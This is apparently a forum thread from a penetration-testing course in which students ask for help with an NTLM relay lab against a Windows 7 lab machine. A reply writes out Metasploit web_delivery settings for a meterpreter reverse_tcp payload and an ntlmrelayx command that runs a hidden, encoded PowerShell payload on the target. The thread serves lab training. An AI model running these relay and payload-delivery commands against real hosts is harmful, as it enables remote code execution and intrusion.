Lab 11

Hello brother I am having issuse in LAB 11 I have tried ntlmxrelay.py responder ./multirelay bla bla bla and msf console with 2 different payloads but i wasn’t successful at all here is the screenshot . This is best I got something . Anyone kindly help me solving this LAB … Kindly see the image below

Hello,
We would need detailed steps/screenshots in order to be able to help you. For this lab with msf6 we need to take into account a few things as the target machine is Windows 7 x64:

  1. There is no AMSI
  2. TLS v1.2 will definitely fail

In metasploit use:

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set SRVHOST tap0
set LHOST tap0
set PSH-AMSIBYPASS false
set PSH-FORCETLS12 false
set PSH-ENCODEDCOMMAND true
run -j

If you are having issues with multirelay you can always use ntlmrelayx as follows:

ntlmrelayx.py -t 172.16.23.100 -c "powershell.exe -nop -w hidden -e JABQAD0Ab...."

1 Like

Hi @adoreste-cee223bb97c I tried following the above the steps also but seems like not working. am not sure whether its because of package !!, Can you Please let me guide this to resolve / another way to exploit. Have attached the result as well please have a look.

When i loaded psh with ntmlrelayx, msf showed this as response .
[*] 172.16.23.100 web_delivery - Delivering Payload (3500 bytes)

Thanks much.